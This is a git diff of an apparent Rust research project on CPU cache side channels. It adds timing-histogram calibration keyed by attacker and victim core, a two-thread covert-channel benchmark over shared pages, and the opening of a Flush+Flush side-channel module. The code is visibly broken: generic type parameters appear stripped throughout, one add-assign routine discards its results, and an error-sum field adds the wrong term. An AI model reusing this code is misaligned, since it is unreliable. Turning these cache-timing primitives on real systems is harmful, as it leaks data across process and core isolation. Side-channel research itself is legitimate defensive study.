@@ -34,6 +34,12 @@ use core::sync::atomic::{spin_loop_hint, AtomicBool, AtomicPtr, Ordering};
use itertools::Itertools;
use atomic::Atomic;
+use core::hash::Hash;
+use core::ops::{Add, AddAssign};
+#[cfg(feature = "no_std")]
+use hashbrown::HashMap;
+#[cfg(feature = "use_std")]
+use std::collections::HashMap;
#[derive(Ord, PartialOrd, Eq, PartialEq)]
pub enum Verbosity {
@@ -106,6 +112,12 @@ pub unsafe fn l3_and_reload(p: *const u8) -> u64 {
only_reload(p)
}
+pub const PAGE_LEN: usize = 1 << 12;
+
+pub fn get_vpn(p: *const T) -> usize {
+ (p as usize) & (!(PAGE_LEN - 1)) // FIXME
+}
+
const BUCKET_SIZE: usize = 5;
const BUCKET_NUMBER: usize = 250;
@@ -918,3 +930,764 @@ pub fn calibrate_L3_miss_hit(
r.into_iter().next().unwrap()
}
+
+/*
+ ASVP trait ?
+ Easily put any combination, use None to signal Any possible value, Some to signal fixed value.
+*/
+
+pub type VPN = usize;
+pub type Slice = u8;
+
+#[derive(PartialEq, Eq, Debug, Hash, Clone, Copy, Default)]
+pub struct ASVP {
+ pub attacker: usize,
+ pub slice: Slice,
+ pub victim: usize,
+ pub page: VPN,
+}
+
+#[derive(PartialEq, Eq, Debug, Hash, Clone, Copy, Default)]
+pub struct CSP {
+ pub core: usize,
+ pub slice: Slice,
+ pub page: VPN,
+}
+
+#[derive(PartialEq, Eq, Debug, Hash, Clone, Copy, Default)]
+pub struct ASP {
+ pub attacker: usize,
+ pub slice: Slice,
+ pub page: VPN,
+}
+
+#[derive(PartialEq, Eq, Debug, Hash, Clone, Copy, Default)]
+pub struct SVP {
+ pub slice: Slice,
+ pub victim: usize,
+ pub page: VPN,
+}
+
+#[derive(PartialEq, Eq, Debug, Hash, Clone, Copy, Default)]
+pub struct SP {
+ pub slice: Slice,
+ pub page: VPN,
+}
+
+#[derive(PartialEq, Eq, Debug, Hash, Clone, Copy, Default)]
+pub struct AV {
+ pub attacker: usize,
+ pub victim: usize,
+}
+
+#[derive(Debug, Clone)]
+pub struct RawHistogram {
+ pub hit: Vec,
+ pub miss: Vec,
+}
+
+// ALL Histogram deal in buckets : FIXME we should clearly distinguish bucket vs time.
+// Thresholds are less than equal.
+impl RawHistogram {
+ pub fn from(
+ mut calibrate_result: CalibrateResult,
+ hit_index: usize,
+ miss_index: usize,
+ ) -> Self {
+ calibrate_result.histogram.push(Vec::default());
+ let hit = calibrate_result.histogram.swap_remove(hit_index);
+ calibrate_result.histogram.push(Vec::default());
+ let miss = calibrate_result.histogram.swap_remove(miss_index);
+ RawHistogram { hit, miss }
+ }
+
+ pub fn empty(len: usize) -> Self {
+ Self {
+ hit: vec![0; len],
+ miss: vec![0; len],
+ }
+ }
+}
+
+// Addition logic
+
+// Tough case, both references.
+
+impl Add for &RawHistogram {
+ type Output = RawHistogram;
+
+ fn add(self, rhs: &RawHistogram) -> Self::Output {
+ assert_eq!(self.hit.len(), rhs.hit.len());
+ assert_eq!(self.miss.len(), rhs.miss.len());
+ assert_eq!(self.hit.len(), self.miss.len());
+ let len = self.hit.len();
+ let mut r = RawHistogram {
+ hit: vec![0; len],
+ miss: vec![0; len],
+ };
+ for i in 0..len {
+ r.hit[i] = self.hit[i] + rhs.hit[i];
+ r.miss[i] = self.miss[i] + rhs.miss[i];
+ }
+ r
+ }
+}
+
+// most common case re-use of self is possible. (Or a reduction to such a case)
+
+impl AddAssign<&RawHistogram> for RawHistogram {
+ //type Rhs = &RawHistogram;
+ fn add_assign(&mut self, rhs: &Self) {
+ assert_eq!(self.hit.len(), rhs.hit.len());
+ assert_eq!(self.miss.len(), rhs.miss.len());
+ assert_eq!(self.hit.len(), self.miss.len());
+
+ for i in 0..self.hit.len() {
+ self.hit[i] + rhs.hit[i];
+ self.miss[i] + rhs.miss[i];
+ }
+ }
+}
+
+// Fallback to most common case
+
+impl Add for RawHistogram {
+ type Output = RawHistogram;
+
+ fn add(mut self, rhs: Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add<&Self> for RawHistogram {
+ type Output = RawHistogram;
+
+ fn add(mut self, rhs: &Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add for &RawHistogram {
+ type Output = RawHistogram;
+
+ fn add(self, mut rhs: RawHistogram) -> Self::Output {
+ rhs += self;
+ rhs
+ }
+}
+
+impl AddAssign for RawHistogram {
+ fn add_assign(&mut self, rhs: Self) {
+ *self += &rhs;
+ }
+}
+
+pub fn cum_sum(vector: &[u32]) -> Vec {
+ let len = vector.len();
+ let mut res = vec![0; len];
+ res[0] = vector[0];
+ for i in 1..len {
+ res[i] = res[i - 1] + vector[i];
+ }
+ assert_eq!(len, res.len());
+ assert_eq!(len, vector.len());
+ res
+}
+
+#[derive(Debug, Clone)]
+pub struct HistogramCumSum {
+ pub num_hit: u32,
+ pub num_miss: u32,
+ pub hit: Vec,
+ pub miss: Vec,
+ pub hit_cum_sum: Vec,
+ pub miss_cum_sum: Vec,
+}
+
+impl HistogramCumSum {
+ pub fn from(raw_histogram: RawHistogram) -> Self {
+ let len = raw_histogram.miss.len();
+
+ assert_eq!(raw_histogram.hit.len(), len);
+
+ // Cum Sums
+ let miss_cum_sum = cum_sum(&raw_histogram.miss);
+ let hit_cum_sum = cum_sum(&raw_histogram.hit);
+ let miss_total = miss_cum_sum[len - 1];
+ let hit_total = hit_cum_sum[len - 1];
+ Self {
+ num_hit: hit_total,
+ num_miss: miss_total,
+ hit: raw_histogram.hit,
+ miss: raw_histogram.miss,
+ hit_cum_sum,
+ miss_cum_sum,
+ }
+ }
+
+ pub fn from_calibrate(
+ calibrate_result: CalibrateResult,
+ hit_index: usize,
+ miss_index: usize,
+ ) -> Self {
+ Self::from(RawHistogram::from(calibrate_result, hit_index, miss_index))
+ }
+
+ pub fn error_for_threshold(&self, threshold: Threshold) -> ErrorPrediction {
+ if threshold.miss_faster_than_hit {
+ ErrorPrediction {
+ true_hit: self.num_hit - self.hit_cum_sum[threshold.bucket_index],
+ true_miss: self.miss_cum_sum[threshold.bucket_index],
+ false_hit: self.num_miss - self.miss_cum_sum[threshold.bucket_index],
+ false_miss: self.hit_cum_sum[threshold.bucket_index],
+ }
+ } else {
+ ErrorPrediction {
+ true_hit: self.hit_cum_sum[threshold.bucket_index],
+ true_miss: self.num_miss - self.miss_cum_sum[threshold.bucket_index],
+ false_hit: self.miss_cum_sum[threshold.bucket_index],
+ false_miss: self.num_hit - self.hit_cum_sum[threshold.bucket_index],
+ }
+ }
+ }
+
+ pub fn len(&self) -> usize {
+ self.hit.len()
+ }
+
+ pub fn empty(len: usize) -> Self {
+ Self {
+ num_hit: 0,
+ num_miss: 0,
+ hit: vec![0; len],
+ miss: vec![0; len],
+ hit_cum_sum: vec![0; len],
+ miss_cum_sum: vec![0; len],
+ }
+ }
+}
+
+// Addition logic
+
+// Tough case, both references.
+
+impl Add for &HistogramCumSum {
+ type Output = HistogramCumSum;
+
+ fn add(self, rhs: &HistogramCumSum) -> Self::Output {
+ assert_eq!(self.hit.len(), self.miss.len());
+ assert_eq!(self.hit.len(), self.hit_cum_sum.len());
+ assert_eq!(self.hit.len(), self.miss_cum_sum.len());
+ assert_eq!(self.hit.len(), rhs.hit.len());
+ assert_eq!(self.hit.len(), rhs.miss.len());
+ assert_eq!(self.hit.len(), rhs.hit_cum_sum.len());
+ assert_eq!(self.hit.len(), rhs.miss_cum_sum.len());
+ let len = self.len();
+ let mut r = HistogramCumSum {
+ num_hit: self.num_hit + rhs.num_hit,
+ num_miss: self.num_miss + rhs.num_miss,
+ hit: vec![0; len],
+ miss: vec![0; len],
+ hit_cum_sum: vec![0; len],
+ miss_cum_sum: vec![0; len],
+ };
+ for i in 0..len {
+ r.hit[i] = self.hit[i] + rhs.hit[i];
+ r.miss[i] = self.miss[i] + rhs.miss[i];
+ r.hit_cum_sum[i] = self.hit_cum_sum[i] + rhs.hit_cum_sum[i];
+ r.miss_cum_sum[i] = self.miss_cum_sum[i] + rhs.miss_cum_sum[i];
+ }
+ r
+ }
+}
+
+// most common case re-use of self is possible. (Or a reduction to such a case)
+
+impl AddAssign<&Self> for HistogramCumSum {
+ fn add_assign(&mut self, rhs: &Self) {
+ assert_eq!(self.hit.len(), self.miss.len());
+ assert_eq!(self.hit.len(), self.hit_cum_sum.len());
+ assert_eq!(self.hit.len(), self.miss_cum_sum.len());
+ assert_eq!(self.hit.len(), rhs.hit.len());
+ assert_eq!(self.hit.len(), rhs.miss.len());
+ assert_eq!(self.hit.len(), rhs.hit_cum_sum.len());
+ assert_eq!(self.hit.len(), rhs.miss_cum_sum.len());
+ self.num_hit += rhs.num_hit;
+ self.num_miss += rhs.num_miss;
+ let len = self.len();
+ for i in 0..len {
+ self.hit[i] += rhs.hit[i];
+ self.miss[i] += rhs.miss[i];
+ self.hit_cum_sum[i] += rhs.hit_cum_sum[i];
+ self.miss_cum_sum[i] += rhs.miss_cum_sum[i];
+ }
+ }
+}
+
+// Fallback to most common case
+
+impl Add for HistogramCumSum {
+ type Output = HistogramCumSum;
+
+ fn add(mut self, rhs: Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add<&Self> for HistogramCumSum {
+ type Output = HistogramCumSum;
+
+ fn add(mut self, rhs: &Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add for &HistogramCumSum {
+ type Output = HistogramCumSum;
+
+ fn add(self, mut rhs: HistogramCumSum) -> Self::Output {
+ rhs += self;
+ rhs
+ }
+}
+
+impl AddAssign for HistogramCumSum {
+ fn add_assign(&mut self, rhs: Self) {
+ *self += &rhs;
+ }
+}
+
+#[derive(Debug, Clone, Copy, Default)]
+pub struct ErrorPrediction {
+ pub true_hit: u32,
+ pub true_miss: u32,
+ pub false_hit: u32,
+ pub false_miss: u32,
+}
+
+impl ErrorPrediction {
+ pub fn total_error(&self) -> u32 {
+ self.false_hit + self.false_miss
+ }
+ pub fn total(&self) -> u32 {
+ self.false_hit + self.false_miss + self.true_hit + self.true_miss
+ }
+ pub fn error_rate(&self) -> f32 {
+ (self.false_miss + self.false_hit) as f32 / (self.total() as f32)
+ }
+}
+
+impl Add for &ErrorPrediction {
+ type Output = ErrorPrediction;
+
+ fn add(self, rhs: &ErrorPrediction) -> Self::Output {
+ ErrorPrediction {
+ true_hit: self.true_hit + rhs.true_hit,
+ true_miss: self.true_miss + rhs.true_miss,
+ false_hit: self.false_hit + rhs.false_hit,
+ false_miss: self.true_miss + rhs.false_miss,
+ }
+ }
+}
+
+// most common case re-use of self is possible. (Or a reduction to such a case)
+
+impl AddAssign<&Self> for ErrorPrediction {
+ fn add_assign(&mut self, rhs: &Self) {
+ self.true_hit += rhs.true_hit;
+ self.true_miss += rhs.true_miss;
+ self.false_hit += rhs.false_hit;
+ self.false_miss += rhs.false_miss;
+ }
+}
+
+// Fallback to most common case
+
+impl Add for ErrorPrediction {
+ type Output = ErrorPrediction;
+
+ fn add(mut self, rhs: Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add<&Self> for ErrorPrediction {
+ type Output = ErrorPrediction;
+
+ fn add(mut self, rhs: &Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add for &ErrorPrediction {
+ type Output = ErrorPrediction;
+
+ fn add(self, mut rhs: ErrorPrediction) -> Self::Output {
+ rhs += self;
+ rhs
+ }
+}
+
+impl AddAssign for ErrorPrediction {
+ fn add_assign(&mut self, rhs: Self) {
+ *self += &rhs;
+ }
+}
+
+#[derive(Debug, Clone)]
+pub struct ErrorPredictions {
+ pub histogram: HistogramCumSum,
+ pub error_miss_less_than_hit: Vec,
+ pub error_hit_less_than_miss: Vec,
+}
+
+impl ErrorPredictions {
+ // BUGGY TODO
+ pub fn predict_errors(hist: HistogramCumSum) -> Self {
+ let mut error_miss_less_than_hit = vec![0; hist.len() - 1];
+ let mut error_hit_less_than_miss = vec![0; hist.len() - 1];
+ for threshold_bucket_index in 0..(hist.len() - 1) {
+ error_miss_less_than_hit[threshold_bucket_index] = hist
+ .error_for_threshold(Threshold {
+ bucket_index: threshold_bucket_index,
+ miss_faster_than_hit: true,
+ })
+ .total_error();
+
+ error_hit_less_than_miss[threshold_bucket_index] = hist
+ .error_for_threshold(Threshold {
+ bucket_index: threshold_bucket_index,
+ miss_faster_than_hit: false,
+ })
+ .total_error();
+ }
+ Self {
+ histogram: hist,
+ error_miss_less_than_hit,
+ error_hit_less_than_miss,
+ }
+ }
+
+ pub fn empty(len: usize) -> Self {
+ Self::predict_errors(HistogramCumSum::empty(len))
+ }
+
+ pub fn debug(&self) {
+ println!("Debug:HEADER TBD");
+ for i in 0..(self.histogram.len() - 1) {
+ println!(
+ "Debug:{:5},{:5},{:6},{:6},{:6}, {:6}",
+ self.histogram.hit[i],
+ self.histogram.miss[i],
+ self.histogram.hit_cum_sum[i],
+ self.histogram.miss_cum_sum[i],
+ self.error_miss_less_than_hit[i],
+ self.error_hit_less_than_miss[i]
+ );
+ }
+ let i = self.histogram.len() - 1;
+ println!(
+ "Debug:{:5},{:5},{:6},{:6}",
+ self.histogram.hit[i],
+ self.histogram.miss[i],
+ self.histogram.hit_cum_sum[i],
+ self.histogram.miss_cum_sum[i]
+ );
+ }
+}
+
+// Addition logic
+
+// Tough case, both references.
+
+impl Add for &ErrorPredictions {
+ type Output = ErrorPredictions;
+
+ fn add(self, rhs: &ErrorPredictions) -> Self::Output {
+ assert_eq!(
+ self.error_hit_less_than_miss.len(),
+ rhs.error_hit_less_than_miss.len()
+ );
+ assert_eq!(
+ self.error_hit_less_than_miss.len(),
+ self.error_miss_less_than_hit.len()
+ );
+ assert_eq!(
+ self.error_miss_less_than_hit.len(),
+ rhs.error_miss_less_than_hit.len()
+ );
+ let len = self.error_miss_less_than_hit.len();
+ let mut r = ErrorPredictions {
+ histogram: &self.histogram + &rhs.histogram,
+ error_miss_less_than_hit: vec![0; len],
+ error_hit_less_than_miss: vec![0; len],
+ };
+ for i in 0..len {
+ r.error_miss_less_than_hit[i] =
+ self.error_miss_less_than_hit[i] + rhs.error_miss_less_than_hit[i];
+ r.error_hit_less_than_miss[i] =
+ self.error_hit_less_than_miss[i] + rhs.error_hit_less_than_miss[i];
+ }
+ r
+ }
+}
+
+// most common case re-use of self is possible. (Or a reduction to such a case)
+
+impl AddAssign<&Self> for ErrorPredictions {
+ fn add_assign(&mut self, rhs: &Self) {
+ assert_eq!(
+ self.error_hit_less_than_miss.len(),
+ rhs.error_hit_less_than_miss.len()
+ );
+ assert_eq!(
+ self.error_hit_less_than_miss.len(),
+ self.error_miss_less_than_hit.len()
+ );
+ assert_eq!(
+ self.error_miss_less_than_hit.len(),
+ rhs.error_miss_less_than_hit.len()
+ );
+ self.histogram += &rhs.histogram;
+ for i in 0..self.error_hit_less_than_miss.len() {
+ self.error_hit_less_than_miss[i] += rhs.error_hit_less_than_miss[i];
+ self.error_miss_less_than_hit[i] += rhs.error_miss_less_than_hit[i];
+ }
+ }
+}
+
+// Fallback to most common case
+
+impl Add for ErrorPredictions {
+ type Output = ErrorPredictions;
+
+ fn add(mut self, rhs: Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add<&Self> for ErrorPredictions {
+ type Output = ErrorPredictions;
+
+ fn add(mut self, rhs: &Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add for &ErrorPredictions {
+ type Output = ErrorPredictions;
+
+ fn add(self, mut rhs: ErrorPredictions) -> Self::Output {
+ rhs += self;
+ rhs
+ }
+}
+
+impl AddAssign for ErrorPredictions {
+ fn add_assign(&mut self, rhs: Self) {
+ *self += &rhs;
+ }
+}
+
+#[derive(Debug, Clone, Copy, Default)]
+pub struct ThresholdError {
+ pub threshold: Threshold,
+ pub error: ErrorPrediction,
+}
+
+#[derive(Debug, Clone)]
+pub struct PotentialThresholds {
+ pub threshold_errors: Vec,
+}
+
+impl PotentialThresholds {
+ pub fn median(mut self) -> Option {
+ if self.threshold_errors.len() > 0 {
+ let index = (self.threshold_errors.len() - 1) / 2;
+ self.threshold_errors.push(Default::default());
+ Some(self.threshold_errors.swap_remove(index))
+ } else {
+ None
+ }
+ }
+
+ pub fn minimizing_total_error(error_pred: ErrorPredictions) -> Self {
+ let mut min_error = u32::max_value();
+ let mut threshold_errors = Vec::new();
+ for i in 0..error_pred.error_miss_less_than_hit.len() {
+ if error_pred.error_miss_less_than_hit[i] < min_error {
+ min_error = error_pred.error_miss_less_than_hit[i];
+ threshold_errors = Vec::new();
+ }
+ if error_pred.error_hit_less_than_miss[i] < min_error {
+ min_error = error_pred.error_hit_less_than_miss[i];
+ threshold_errors = Vec::new();
+ }
+ if error_pred.error_miss_less_than_hit[i] == min_error {
+ let threshold = Threshold {
+ bucket_index: i,
+ miss_faster_than_hit: true,
+ };
+ let error = error_pred.histogram.error_for_threshold(threshold);
+ threshold_errors.push(ThresholdError { threshold, error })
+ }
+ if error_pred.error_hit_less_than_miss[i] == min_error {
+ let threshold = Threshold {
+ bucket_index: i,
+ miss_faster_than_hit: false,
+ };
+ let error = error_pred.histogram.error_for_threshold(threshold);
+ threshold_errors.push(ThresholdError { threshold, error })
+ }
+ }
+ Self { threshold_errors }
+ }
+}
+
+// Thresholds are less than equal.
+// usize for bucket, u64 for time.
+#[derive(Debug, Clone, Copy, Default, PartialEq, Eq)]
+pub struct Threshold {
+ pub bucket_index: usize,
+ pub miss_faster_than_hit: bool,
+}
+
+impl Threshold {
+ // FIXME !!!!
+ fn to_time(&self, bucket: usize) -> u64 {
+ bucket as u64
+ }
+
+ pub fn is_hit(&self, time: u64) -> bool {
+ self.miss_faster_than_hit && time >= self.to_time(self.bucket_index)
+ || !self.miss_faster_than_hit && time < self.to_time(self.bucket_index)
+ }
+}
+
+pub fn calibration_result_to_ASVP T>(
+ results: Vec,
+ base: *const u8,
+ analysis: Analysis,
+ slicing: &impl Fn(usize) -> u8,
+) -> Result, nix::Error> {
+ let mut analysis_result: HashMap = HashMap::new();
+ for calibrate_2t_result in results {
+ let attacker = calibrate_2t_result.main_core;
+ let victim = calibrate_2t_result.helper_core;
+ match calibrate_2t_result.res {
+ Err(e) => return Err(e),
+ Ok(calibrate_1t_results) => {
+ for result_1t in calibrate_1t_results {
+ let offset = result_1t.offset;
+ let addr = unsafe { base.offset(offset) };
+ let page = get_vpn(addr); //TODO
+ let slice = slicing(addr as usize);
+ let analysed = analysis(result_1t);
+ let asvp = ASVP {
+ attacker,
+ slice,
+ victim,
+ page,
+ };
+ analysis_result.insert(asvp, analysed);
+ }
+ }
+ }
+ }
+ Ok(analysis_result)
+}
+
+pub fn map_values(input: HashMap, f: F) -> HashMap
+where
+ K: Hash + Eq,
+ F: Fn(U, &K) -> V,
+{
+ let mut results = HashMap::new();
+ for (k, u) in input {
+ let f_u = f(u, &k);
+ results.insert(k, f_u);
+ }
+ results
+}
+
+pub fn accumulate(
+ input: HashMap,
+ reduction: Reduction,
+ accumulator_default: AccumulatorDefault,
+ aggregation: Accumulation,
+) -> HashMap
+where
+ K: Hash + Eq + Copy,
+ RK: Hash + Eq + Copy,
+ Reduction: Fn(K) -> RK,
+ Accumulation: Fn(&mut Accumulator, V, K, RK) -> (),
+ AccumulatorDefault: Fn() -> Accumulator,
+{
+ let mut accumulators = HashMap::new();
+ for (k, v) in input {
+ let rk = reduction(k);
+ aggregation(
+ accumulators
+ .entry(rk)
+ .or_insert_with(|| accumulator_default()),
+ v,
+ k,
+ rk,
+ );
+ }
+ accumulators
+}
+
+pub fn reduce(
+ input: HashMap,
+ reduction: Reduction,
+ accumulator_default: AccumulatorDefault,
+ aggregation: Accumulation,
+ extraction: Extract,
+) -> HashMap
+where
+ K: Hash + Eq + Copy,
+ RK: Hash + Eq + Copy,
+ Reduction: Fn(K) -> RK,
+ AccumulatorDefault: Fn() -> Accumulator,
+ Accumulation: Fn(&mut Accumulator, V, K, RK) -> (),
+ Extract: Fn(Accumulator, &RK) -> RV,
+{
+ let accumulators = accumulate(input, reduction, accumulator_default, aggregation);
+ let result = map_values(accumulators, extraction);
+ result
+}
+
+/*
+pub fn compute_threshold_error() -> (Threshold, ()) {
+ unimplemented!();
+} // TODO
+*/
+
+#[cfg(test)]
+mod tests {
+
+ use crate::calibration::map_values;
+ #[cfg(feature = "no_std")]
+ use hashbrown::HashMap;
+ #[cfg(feature = "use_std")]
+ use std::collections::HashMap;
+
+ #[test]
+ fn test_map_values() {
+ let mut input = HashMap::new();
+ input.insert(0, "a");
+ input.insert(1, "b");
+ let output = map_values(input, |c| c.to_uppercase());
+ assert_eq!(output[&0], "A");
+ assert_eq!(output[&1], "B");
+ }
+}
diff --git a/covert_channels_evaluation/.cargo/config b/covert_channels_evaluation/.cargo/config
new file mode 100644
index 0000000..2f05654
--- /dev/null
+++ b/covert_channels_evaluation/.cargo/config
@@ -0,0 +1,2 @@
+[build]
+target = "x86_64-unknown-linux-gnu"
diff --git a/covert_channels_evaluation/Cargo.toml b/covert_channels_evaluation/Cargo.toml
new file mode 100644
index 0000000..83c16a7
--- /dev/null
+++ b/covert_channels_evaluation/Cargo.toml
@@ -0,0 +1,13 @@
+[package]
+name = "covert_channels_evaluation"
+version = "0.1.0"
+authors = ["GuillaumeDIDIER "]
+edition = "2018"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
+rand = "0.7.3"
+bit_field = "0.10.1"
+turn_lock = { path = "../turn_lock" }
+cache_utils = { path = "../cache_utils" }
diff --git a/covert_channels_evaluation/src/lib.rs b/covert_channels_evaluation/src/lib.rs
new file mode 100644
index 0000000..1bad8ce
--- /dev/null
+++ b/covert_channels_evaluation/src/lib.rs
@@ -0,0 +1,222 @@
+#![feature(unsafe_block_in_unsafe_fn)]
+#![deny(unsafe_op_in_unsafe_fn)]
+use turn_lock::TurnLock;
+
+const PAGE_SIZE: usize = 1 << 12; // FIXME Magic
+
+// design docs
+
+// Build a channel using x pages + one synchronisation primitive.
+
+// F+R only use one line per page
+// F+F should use several line per page
+// Each page has 1<<12 bytes / 1<<6 bytes per line, hence 64 lines (or 6 bits of info).
+
+// General structure : two threads, a transmitter and a reciever. Transmitter generates bytes, Reciever reads bytes, then on join compare results for accuracy.
+// Alos time in order to determine duration, in rdtsc and seconds.
+
+use bit_field::BitField;
+use cache_utils::mmap::MMappedMemory;
+use cache_utils::rdtsc_fence;
+use std::any::Any;
+use std::collections::VecDeque;
+use std::sync::Arc;
+use std::thread;
+
+/**
+ * Safety considerations : Not ensure thread safety, need proper locking as needed.
+ */
+pub trait CovertChannel: Send + Sync {
+ const BIT_PER_PAGE: usize;
+ unsafe fn transmit(&self, page: *const u8, bits: &mut BitIterator);
+ unsafe fn receive(&self, page: *const u8) -> Vec;
+}
+
+pub struct CovertChannelBenchmarkResult {
+ pub num_bytes_transmitted: usize,
+ pub num_bit_errors: usize,
+ pub error_rate: f64,
+ pub time_rdtsc: u64,
+ //pub time_seconds: todo
+}
+
+pub struct BitIterator<'a> {
+ bytes: &'a Vec,
+ byte_index: usize,
+ bit_index: u8,
+}
+
+impl<'a> BitIterator<'a> {
+ pub fn new(bytes: &'a Vec) -> BitIterator<'a> {
+ BitIterator {
+ bytes,
+ byte_index: 0,
+ bit_index: 0,
+ }
+ }
+
+ pub fn atEnd(&self) -> bool {
+ self.byte_index >= self.bytes.len()
+ }
+}
+
+impl Iterator for BitIterator<'_> {
+ type Item = bool;
+
+ fn next(&mut self) -> Option {
+ if let Some(b) = self.bytes.get(self.byte_index) {
+ let r = (b >> (u8::BIT_LENGTH - 1 - self.bit_index as usize)) & 1 != 0;
+ self.bit_index += 1;
+ self.byte_index += self.bit_index as usize / u8::BIT_LENGTH;
+ self.bit_index = self.bit_index % u8::BIT_LENGTH as u8;
+ Some(r)
+ } else {
+ None
+ }
+ }
+}
+
+struct CovertChannelPage {
+ pub turn: TurnLock,
+ pub addr: *const u8,
+}
+
+struct CovertChannelParams {
+ pages: Vec,
+ covert_channel: Arc,
+ transmit_core: usize,
+}
+
+unsafe impl Send for CovertChannelParams {}
+
+fn transmit_thread(
+ num_bytes: usize,
+ mut params: CovertChannelParams,
+) -> (u64, Vec) {
+ let mut result = Vec::new();
+ result.reserve(num_bytes);
+ for _ in 0..num_bytes {
+ let byte = rand::random();
+ result.push(byte);
+ }
+ let mut bit_iter = BitIterator::new(&result);
+ let start = unsafe { rdtsc_fence() };
+ while !bit_iter.atEnd() {
+ for page in params.pages.iter_mut() {
+ page.turn.wait();
+ unsafe { params.covert_channel.transmit(page.addr, &mut bit_iter) };
+ page.turn.next();
+ }
+ }
+
+ (start, result)
+}
+
+pub fn benchmark_channel(
+ channel: T,
+ num_pages: usize,
+ num_bytes: usize,
+ transmit_core: usize,
+ receive_core: usize,
+) -> CovertChannelBenchmarkResult {
+ // Allocate pages
+ let size = num_pages * PAGE_SIZE;
+ let m = MMappedMemory::new(size);
+ let mut pages_transmit = Vec::new();
+ let mut pages_receive = Vec::new();
+ let array: &[u8] = m.slice();
+ for i in 0..num_pages {
+ let addr = &array[i * PAGE_SIZE] as *const u8;
+ let mut turns = TurnLock::new(2);
+ let mut t_iter = turns.drain(0..);
+ let receive_lock = t_iter.next().unwrap();
+ let transmit_lock = t_iter.next().unwrap();
+ assert!(t_iter.next().is_none());
+ pages_transmit.push(CovertChannelPage {
+ turn: transmit_lock,
+ addr,
+ });
+ pages_receive.push(CovertChannelPage {
+ turn: receive_lock,
+ addr,
+ });
+ }
+ let covert_channel_arc = Arc::new(channel);
+ let params = CovertChannelParams {
+ pages: pages_transmit,
+ covert_channel: covert_channel_arc.clone(),
+ transmit_core,
+ };
+
+ if transmit_core == receive_core {
+ unimplemented!()
+ }
+
+ let helper = thread::spawn(move || transmit_thread(num_bytes, params));
+ // Create the thread parameters
+ let mut received_bytes: Vec = Vec::new();
+ let mut received_bits = VecDeque::::new();
+ while received_bytes.len() < num_bytes {
+ for page in pages_receive.iter_mut() {
+ page.turn.wait();
+ let mut bits = unsafe { covert_channel_arc.receive(page.addr) };
+ page.turn.next();
+ received_bits.extend(&mut bits.iter());
+ while received_bits.len() >= u8::BIT_LENGTH {
+ let mut byte = 0;
+ for i in 0..u8::BIT_LENGTH {
+ byte <<= 1;
+ let bit = received_bits.pop_front().unwrap();
+ byte |= bit as u8;
+ }
+ received_bytes.push(byte);
+ }
+ }
+ // TODO
+ // receiver thread
+ }
+ let stop = unsafe { rdtsc_fence() };
+ let r = helper.join();
+ let (start, sent_bytes) = match r {
+ Ok(r) => r,
+ Err(e) => panic!("Join Error: {:?#}"),
+ };
+ assert_eq!(sent_bytes.len(), received_bytes.len());
+ assert_eq!(num_bytes, received_bytes.len());
+
+ let mut num_bit_error = 0;
+ for i in 0..num_bytes {
+ num_bit_error += (sent_bytes[i] ^ received_bytes[i]).count_ones() as usize;
+ }
+
+ let error_rate = (num_bit_error as f64) / ((num_bytes * u8::BIT_LENGTH) as f64);
+ // Create transmit thread
+ CovertChannelBenchmarkResult {
+ num_bytes_transmitted: num_bytes,
+ num_bit_errors: num_bit_error,
+ error_rate,
+ time_rdtsc: stop - start,
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use crate::BitIterator;
+
+ #[test]
+ fn it_works() {
+ assert_eq!(2 + 2, 4);
+ }
+
+ #[test]
+ fn test_bit_vec() {
+ let bit_iter = BitIterator::new(vec![0x55, 0xf]);
+ let results = vec![
+ false, true, false, true, false, true, false, true, false, false, false, false, true,
+ true, true, true,
+ ];
+ for (i, bit) in bit_iter.enumerate() {
+ assert_eq!(results[i], bit);
+ }
+ }
+}
diff --git a/flush_flush/.cargo/config b/flush_flush/.cargo/config
new file mode 100644
index 0000000..2f05654
--- /dev/null
+++ b/flush_flush/.cargo/config
@@ -0,0 +1,2 @@
+[build]
+target = "x86_64-unknown-linux-gnu"
diff --git a/flush_flush/Cargo.toml b/flush_flush/Cargo.toml
new file mode 100644
index 0000000..66fee6e
--- /dev/null
+++ b/flush_flush/Cargo.toml
@@ -0,0 +1,12 @@
+[package]
+name = "flush_flush"
+version = "0.1.0"
+authors = ["GuillaumeDIDIER "]
+edition = "2018"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
+cache_utils = { path = "../cache_utils" }
+cache_side_channel = { path = "../cache_side_channel" }
+nix = "0.18.0"
diff --git a/flush_flush/src/lib.rs b/flush_flush/src/lib.rs
new file mode 100644
index 0000000..c0765a9
--- /dev/null
+++ b/flush_flush/src/lib.rs
@@ -0,0 +1,614 @@
+#![feature(unsafe_block_in_unsafe_fn)]
+#![deny(unsafe_op_in_unsafe_fn)]
+
+pub mod naive;
+
+use cache_side_channel::SideChannelError::{AddressNotCalibrated, AddressNotReady};
+use cache_side_channel::{
+ CacheStatus, ChannelFatalError, MultipleAddrCacheSideChannel, SideChannelError,
+ SingleAddrCacheSideChannel,
+};
+use cache_utils::calibration::{
+ calibrate_fixed_freq_2_thread, get_cache_slicing, get_vpn, only_flush, CalibrateOperation2T,
+ CalibrationOptions, HistParams, Verbosity, CFLUSH_BUCKET_NUMBER, CFLUSH_BUCKET_SIZE,
+ CFLUSH_NUM_ITER, PAGE_LEN,
+};
+use cache_utils::calibration::{ErrorPrediction, Slice, Threshold, ThresholdError, AV, SP, VPN};
+use cache_utils::complex_addressing::CacheSlicing;
+use cache_utils::{find_core_per_socket, flush, maccess, noop};
+use nix::sched::{sched_getaffinity, sched_setaffinity, CpuSet};
+use nix::unistd::Pid;
+use std::collections::{HashMap, HashSet};
+use std::fmt;
+use std::fmt::{Debug, Formatter};
+
+pub struct FlushAndFlush {
+ thresholds: HashMap,
+ addresses_ready: HashSet<*const u8>,
